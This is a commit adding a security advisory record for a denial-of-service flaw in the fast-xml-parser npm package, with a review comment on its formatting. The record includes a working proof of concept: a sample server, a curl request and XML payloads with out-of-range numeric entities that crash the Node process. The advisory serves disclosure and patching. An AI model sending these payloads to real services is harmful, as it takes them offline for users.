
Commit 66a8a53

1 parent 00cf2ea commit 66a8a53


1 file changed

+72
-0
lines changed

Lines changed: 72 additions & 0 deletions
@@ -0,0 +1,72 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-37qj-frw5-hhjh",
4+
"modified": "2026-01-30T20:10:14Z",
5+
"published": "2026-01-30T20:10:14Z",
6+
"aliases": [
7+
"CVE-2026-25128"
8+
],
9+
"summary": "fast-xml-parser has RangeError DoS Numeric Entities Bug",
10+
"details": "### Summary\nA RangeError vulnerability exists in the numeric entity processing of fast-xml-parser when parsing XML with out-of-range entity code points (e.g., `&#9999999;` or `&#xFFFFFF;`). This causes the parser to throw an uncaught exception, crashing any application that processes untrusted XML input.\n\n### Details\nThe vulnerability exists in `/src/xmlparser/OrderedObjParser.js` at lines 44-45:\n\n```javascript\n\"num_dec\": { regex: /&#([0-9]{1,7});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 10)) },\n\"num_hex\": { regex: /&#x([0-9a-fA-F]{1,6});/g, val : (_, str) => String.fromCodePoint(Number.parseInt(str, 16)) },\n```\n\nThe `String.fromCodePoint()` method throws a `RangeError` when the code point exceeds the valid Unicode range (0 to 0x10FFFF / 1114111). The regex patterns can capture values far exceeding this:\n- `[0-9]{1,7}` matches up to 9,999,999\n- `[0-9a-fA-F]{1,6}` matches up to 0xFFFFFF (16,777,215)\n\nThe entity replacement in `replaceEntitiesValue()` (line 452) has no try-catch:\n\n```javascript\nval = val.replace(entity.regex, entity.val);\n```\n\nThis causes the RangeError to propagate uncaught, crashing the parser and any application using it.\n### PoC\n#### Setup\n\nCreate a directory with these files:\n\n```\npoc/\n├── package.json\n├── server.js\n```\n\n**package.json**\n```json\n{ \"dependencies\": { \"fast-xml-parser\": \"^5.3.3\" } }\n```\n\n**server.js**\n```javascript\nconst http = require('http');\nconst { XMLParser } = require('fast-xml-parser');\n\nconst parser = new XMLParser({ processEntities: true, htmlEntities: true });\n\nhttp.createServer((req, res) => {\n if (req.method === 'POST' && req.url === '/parse') {\n let body = '';\n req.on('data', c => body += c);\n req.on('end', () => {\n const result = parser.parse(body); // No try-catch - will crash!\n res.end(JSON.stringify(result));\n });\n } else {\n res.end('POST /parse with XML body');\n }\n}).listen(3000, () => 
console.log('http://localhost:3000'));\n```\n\n#### Run\n\n```bash\n# Setup\nnpm install\n\n# Terminal 1: Start server\nnode server.js\n\n# Terminal 2: Send malicious payload (server will crash)\ncurl -X POST -H \"Content-Type: application/xml\" -d '<?xml version=\"1.0\"?><root>&#9999999;</root>' http://localhost:3000/parse\n``` \n#### Result\n\nServer crashes with:\n```\nRangeError: Invalid code point 9999999\n```\n\n#### Alternative Payloads\n\n```xml\n<!-- Hex variant -->\n<?xml version=\"1.0\"?><root>&#xFFFFFF;</root>\n\n<!-- In attribute -->\n<?xml version=\"1.0\"?><root attr=\"&#9999999;\"/>\n```\n\n### Impact\n*Denial of Service (DoS):** Any application using fast-xml-parser to process untrusted XML input will crash when encountering malformed numeric entities. This affects:\n\n- **API servers** accepting XML payloads\n- **File processors** parsing uploaded XML files\n- **Message queues** consuming XML messages\n- **RSS/Atom feed parsers**\n- **SOAP/XML-RPC services**\n\nA single malicious request is sufficient to crash the entire Node.js process, causing service disruption until manual restart.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "fast-xml-parser"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "4.3.6"
29+
},
30+
{
31+
"fixed": "5.3.4"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 5.3.3"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-37qj-frw5-hhjh"
45+
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25128"
49+
},
50+
{
51+
"type": "WEB",
52+
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/4e387f61c4a5cef792f6a2f42467013290bf95dc"
53+
},
54+
{
55+
"type": "PACKAGE",
56+
"url": "https://github.com/NaturalIntelligence/fast-xml-parser"
57+
},
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.4"
61+
}
62+
],
63+
"database_specific": {
64+
"cwe_ids": [
65+
"CWE-248"
66+
],
67+
"severity": "HIGH",
68+
"github_reviewed": true,
69+
"github_reviewed_at": "2026-01-30T20:10:14Z",
70+
"nvd_published_at": "2026-01-30T16:16:14Z"
71+
}
72+
}
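Review bot: the Impact section inside the `details` field has unbalanced bold markers, `*Denial of Service (DoS):** Any application ...` opens with one asterisk and closes with two, so GitHub will render a stray asterisk instead of bold text; change it to `**Denial of Service (DoS):** Any application ...`. The remainder of the record is internally consistent: the CVSS 3.1 vector `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` scores 7.5, which matches `"severity": "HIGH"`; the ECOSYSTEM range `introduced 4.3.6` / `fixed 5.3.4` agrees with `last_known_affected_version_range: "<= 5.3.3"`; and CWE-248 (Uncaught Exception) fits the unhandled `RangeError` from `String.fromCodePoint()` that the text describes. One smaller documentation point: the `details` text pins the vulnerable code to specific line numbers (`lines 44-45`, `line 452`) of `OrderedObjParser.js`, which drift across releases; since the fix commit `4e387f61c4a5cef792f6a2f42467013290bf95dc` is already in `references`, pointing readers at that commit for the exact location would age better.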
